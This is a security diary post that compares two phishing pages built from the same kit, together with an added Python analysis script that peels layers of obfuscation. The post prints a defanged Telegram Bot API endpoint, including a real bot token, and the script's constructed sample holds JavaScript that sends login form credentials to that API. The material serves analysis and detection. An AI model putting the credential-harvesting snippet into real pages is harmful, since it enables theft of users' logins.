A Tale of Two Phishing Sites

    Published: 2025-03-28. Last Updated: 2025-03-28 12:17:25 UTC
    by Jan Kopriva (Version: 1)
    0 comment(s)

    In phishing and in malspam, as in any other field, one can see certain trends develop over time. For obvious reasons, most threat actors like to use techniques and approaches that are novel and, thus, more effective. This commonly leads to the adoption of the same techniques and technologies by multiple threat actors at the same time, and it applies even to the phishing kits they use. Still, the same kit may end up looking completely different in the hands of different actors, as the following example shows.

    Since our main “handler” e-mail address has been publicly listed for years on the ISC website, it has been scraped countless times by various bots and consequently added to many address lists used in phishing campaigns. We therefore receive quite a lot of different phishing and malspam samples on it. Two of these caught my attention yesterday – not because of the content of the messages themselves (both were run-of-the-mill phishing messages using the usual lures – an “almost full mailbox” and an “expiring domain registration”), but because of the websites they linked to.

    Links from both messages led to legitimate domains that had clearly been compromised. The credential-stealing pages were nearly identical in both cases, indicating that the same phishing kit was the basis for both…

    It soon turned out that this was where the similarities ended, however.

    The code of the first page was not obfuscated in any way, and it was easy to identify how and where the credentials were supposed to be sent – specifically, to another compromised web server.

    Although it looked nearly the same, under the proverbial hood, the second page was significantly different.

    Since its authors left in the corresponding banner, we can clearly see that the HTML code was obfuscated using a simple function offered by the Snap Builder service…

    This layer of protection, trivial as it is to bypass, wasn't the only one present: once the HTML was decoded into readable form, parts of it still turned out to be obfuscated through a common substitution mechanism.

    Bypassing similar protection is of course reasonably simple, and in this instance, it could even be done manually, as the following example shows.

    The URL to which the credentials were to be sent turned out to be a Telegram Bot API endpoint, with the bot token (the only credential that API requires) embedded directly in the page:

    hxxps[:]//api.telegram[.]org/bot7246282440:AAHJb7KssReEsgMVGaXOjj0TL_3mJGAMIcA/sendMessage
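    What the manual decoding described above looks like when scripted, as an added example that is not part of the diary and not the phishing kit's own code. It assumes the outer layer is HTML that has been percent-encoded and replayed through document.write(unescape('...')), the usual output of such HTML "protectors" (the diary does not reproduce the encoded text, so this format is an assumption); it peels any number of such layers and then searches the clear HTML for a Telegram Bot API call, extracting the bot token, the method and the chat_id it delivers to. The sample page, bot token and chat_id are constructed for the example. The second, substitution-based layer mentioned above is not specified on the page, so the script does not attempt it.

```python
import re
from urllib.parse import quote, unquote, urlsplit

# Outer layer (assumed format): HTML percent-encoded and replayed through
# document.write(unescape('...')).  Matches either quote style and any whitespace.
DOC_WRITE_RE = re.compile(
    r"document\.write\(\s*unescape\(\s*(['\"])(?P<body>.*?)\1\s*\)\s*\)", re.S
)
# Telegram Bot API call: https://api.telegram.org/bot<bot id>:<secret>/<method>
TELEGRAM_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]{30,})/(?P<method>\w+)"
)
# chat_id as it appears in JSON or form-encoded bodies: chat_id: "123", chat_id=123, ...
CHAT_ID_RE = re.compile(r"chat_id\W{0,4}(-?\d{5,})")


def js_unescape(s: str) -> str:
    """Mimic JavaScript's legacy unescape(): %uXXXX -> code point, %XX -> Latin-1 code point."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    # latin-1 so that every %XX becomes exactly one character, as unescape() does
    return unquote(s, encoding="latin-1")


def peel_unescape_layers(html: str, max_layers: int = 10) -> tuple[str, int]:
    """Strip nested document.write(unescape(...)) wrappers; returns (plain html, layers removed)."""
    layers = 0
    while layers < max_layers:
        m = DOC_WRITE_RE.search(html)
        if not m:
            break
        html = js_unescape(m.group("body"))
        layers += 1
    return html, layers


def defang_url(url: str) -> str:
    """Write a URL in the hxxps[:]//host[.]tld style used above so it cannot be clicked by accident."""
    parts = urlsplit(url)
    host = parts.netloc
    if "." in host:
        head, tail = host.rsplit(".", 1)
        host = f"{head}[.]{tail}"
    scheme = "hxxps" if parts.scheme == "https" else "hxxp"
    query = f"?{parts.query}" if parts.query else ""
    return f"{scheme}[:]//{host}{parts.path}{query}"


def extract_telegram_endpoints(html: str) -> list[dict]:
    """Find Telegram Bot API exfiltration URLs and the chat_id they deliver to, when one is nearby."""
    found = []
    for m in TELEGRAM_RE.finditer(html):
        # The chat_id normally sits in the same fetch()/XHR call, i.e. within a few hundred bytes.
        window = html[m.start(): m.end() + 400]
        chat = CHAT_ID_RE.search(window)
        found.append({
            "url": m.group(0),
            "defanged": defang_url(m.group(0)),
            "bot_id": m.group("token").split(":", 1)[0],
            "token": m.group("token"),
            "method": m.group("method"),
            "chat_id": chat.group(1) if chat else None,
        })
    return found


def analyse(page: str) -> dict:
    """Peel the wrapper(s), then look for the Telegram exfiltration endpoint in the clear HTML."""
    clean, layers = peel_unescape_layers(page)
    return {"layers": layers, "html": clean, "telegram": extract_telegram_endpoints(clean)}


# --- constructed sample (not the real phishing page); the token is a made-up placeholder ---
SAMPLE_TOKEN = "123456789:AAFakeTokenForTheExample0123456789abcde"
INNER_HTML = f"""<html><body>
<form id="login"><input name="email"><input name="pass" type="password"><button>Sign in</button></form>
<script>
document.getElementById('login').onsubmit = function (e) {{
  e.preventDefault();
  var msg = 'Email: ' + login.email.value + ' Pass: ' + login.pass.value;
  fetch('https://api.telegram.org/bot{SAMPLE_TOKEN}/sendMessage', {{
    method: 'POST', headers: {{'Content-Type': 'application/json'}},
    body: JSON.stringify({{chat_id: "1234567890", text: msg}})
  }});
}};
</script></body></html>"""


def wrap_in_document_write(html: str) -> str:
    """Build the percent-encoded wrapper the way such HTML 'protectors' do (assumed format)."""
    return f"<script>document.write(unescape('{quote(html, safe='')}'))</script>"


# Two nested layers, to show that peeling is iterative rather than one-shot.
SAMPLE_PAGE = wrap_in_document_write(wrap_in_document_write(INNER_HTML))
RESULT = analyse(SAMPLE_PAGE)

if __name__ == "__main__":
    print(f"wrappers removed: {RESULT['layers']}")
    for ep in RESULT["telegram"]:
        print(f"{ep['method']} via bot {ep['bot_id']} -> chat_id {ep['chat_id']}: {ep['defanged']}")
```

    Unlike the first page, there is no attacker-controlled domain to block here: the exfiltration goes to api.telegram.org, which plenty of legitimate traffic also uses. The indicators worth recording are therefore the bot token (in particular the numeric bot id before the colon) and the chat_id, and the detection worth writing is a web page's client-side script calling the Bot API sendMessage method at all.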

    As we can see, although the visual similarities make it almost certain that both credential-stealing pages started from the same phishing kit, they turned out to be quite different in the way they functioned (one posting to a compromised web server, the other to a Telegram bot) and in the way they were protected.

    This shows quite well that although the aforementioned claim about threat actors aligning in their use of similar techniques and tools holds true, this doesn’t necessarily mean that the end result will be the same…

    -----------
    Jan Kopriva
    LinkedIn
    Nettles Consulting

